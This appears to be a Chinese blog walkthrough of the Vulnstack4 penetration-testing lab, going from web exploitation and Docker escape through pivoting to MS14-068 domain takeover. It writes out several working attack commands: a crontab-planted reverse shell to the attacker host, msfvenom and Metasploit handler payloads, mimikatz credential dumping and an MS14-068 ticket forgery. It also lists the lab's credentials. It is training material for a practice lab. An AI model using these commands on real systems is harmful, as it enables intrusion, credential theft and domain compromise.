【红日靶场】vulnstack4-完整渗透过程

系列文章目录

【红日靶场】vulnstack1-完整渗透过程
【红日靶场】vulnstack2-完整渗透过程
【红日靶场】vulnstack3-完整渗透过程
【红日靶场】vulnstack4-完整渗透过程



前言


提示:以下是本篇文章正文内容,下面案例可供参考

一、p环境初始化

无网络环境net1(157段可以换成NAT模式)和net2(183段):
在这里插入图片描述

web虚拟机配置

在这里插入图片描述

win7配置:

在这里插入图片描述

DC配置:

在这里插入图片描述

kaliLinux配置:

VMnet1网卡可以访问web:
在这里插入图片描述
全部开机

机器密码

ubuntu:ubuntu域成员机器
douser:Dotest123
DC:administrator:Test2008
对应的网络:
在这里插入图片描述
修改root密码:
在这里插入图片描述
重新启动docker
在这里插入图片描述
docker restart $(docker ps -aq)
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

二、开始渗透

靶场学习渗透路径

st漏洞利用
phpmyadmin getshell
tomcat 漏洞利用
docker逃逸
ms14-068
ssh密钥利用
流量转发
历史命令信息泄露
域渗透

目标:192.168.157.128

信息收集

在这里插入图片描述

在这里插入图片描述

外网打点

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
内网是在容器内:
在这里插入图片描述
传个冰蝎马:

在这里插入图片描述
传个马:
在这里插入图片描述
在这里插入图片描述
穿个冰蝎马:
在这里插入图片描述
内网是172段:现在是容器的root权限
容器环境确定:

ls -alh /.dockerenv
cat /proc/1/cgroup

在这里插入图片描述

容器逃逸

有wget命令:
在这里插入图片描述
这里不存在特权模式启动容器逃逸:判断是否是特权模式启动,如果是以特权模式启动的话,CapEff对应的掩码值应该为0000003fffffffff。
cat /proc/self/status |grep Cap
在这里插入图片描述
这个容器不具备逃逸的环境:
在这里插入图片描述

拿另一个2002端口

在这里插入图片描述
在这里插入图片描述
在传一个冰蝎马:
在这里插入图片描述
在这里插入图片描述
这个容器可能具备提权条件
在这里插入图片描述
再次逃逸:
mkdir /julien
在这里插入图片描述
在这里插入图片描述
kali监听:
在这里插入图片描述

弹shell到kali

touch /julien/julien.sh
echo "bash -i >& /dev/tcp/192.168.157.129/8888 0>&1" >/julien/julien.sh
echo "* * * * * root bash /julien.sh" >> /julien/etc/crontab

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
现在root权限直接改密码:
在这里插入图片描述
连接失败:
在这里插入图片描述
但是发现root没有ssh的权限:查看用户
在这里插入图片描述
修改Ubuntu的密码:连接成功
在这里插入图片描述
直接切换root权限:
在这里插入图片描述
上线msf:
生成木马:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.157.129 LPORT=5555 -f elf > shell.elf

kali监听:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.157.129
set LPORT 5555
exploit
上传执行
在这里插入图片描述
在这里插入图片描述
做socke:
在这里插入图片描述

在这里插入图片描述
session现在是会自动加路由到内网段
在这里插入图片描述
直接做:
在这里插入图片描述
修改配置:vim /etc/proxychains4.conf

在这里插入图片描述
测试一下内网:
在这里插入图片描述

内网探测

直接fscan在kali中探测183网段:
在这里插入图片描述

小插曲

扫到一半发现好像少了一台:
这个win7应该是电源设置没做,大家记得做一下:
在这里插入图片描述

横向移动

可以看到:129和130主机存在ms17-010
在这里插入图片描述
使用ms17-010:

kali的地址为:192.168.157.129
win7:192.168.183.129
server2008:192.168.183.130
在这里插入图片描述
开始攻击:

在这里插入图片描述
没成功:
在这里插入图片描述
试一下130主机:
在这里插入图片描述
失败了

使用代理的msf尝试利用:

在这里插入图片描述
在这里插入图片描述
直接打蓝屏了win7:这次更猛直接卡死了
硬件关机都不行了,服了
在这里插入图片描述

终于在重启3次后成功了:
在这里插入图片描述
在这里插入图片描述
demo域:
在这里插入图片描述

尝试hash传递:(失败)
在这里插入图片描述

在这里插入图片描述

前面介绍中有个ms14-068的漏洞:作者已经为我们准备好了工具
在这里插入图片描述
mimikatz.exe
这里会列出密码
sekurlsa::logonpasswords

直接用mimikatz.exe抓取:先做持久化建用户
我这ms17-010没shell了:直接在win7操作
在这里插入图片描述
这个靶场有问题:直接任务管理器结束(主机不会关机)
在这里插入图片描述
直接使用正向由kali去连接win7:
生成:
msfvenom -p windows/meterpreter/bind_tcp -f exe -o shell.exe
放win7运行

use exploit/multi/handler
set payload  windows/meterpreter/bind_tcp
set rhost  192.168.183.130
run

MS14-068 域提权漏洞

​上面我们已经抓到密码了

条件:获得普通域用户以及密码 ,以及用户的suid ip为域控ip

ms14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.131 -p Dotest123

运行:mimikatz
mimikatz # kerberos::purge 清空凭证
mimikatz # kerberos::list 查看凭证

列表:
mimikatz # kerberos::ptc TGT_douser@demo.com.ccache 导入票据
在这里插入图片描述
成功拿到域控:
在这里插入图片描述

其他方法:Linux上线cs

这里感觉有点麻烦直接上线cs:
在这里插入图片描述
生成Linux马:

在这里插入图片描述
添加监听器:
在这里插入图片描述
在这里插入图片描述
成功上线:
在这里插入图片描述
这里是Ubuntu权限可以切换root执行:
在这里插入图片描述

在这里插入图片描述
这里不会用这个插件横向失败了,这里这个插件有会用的可以私我一下。

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值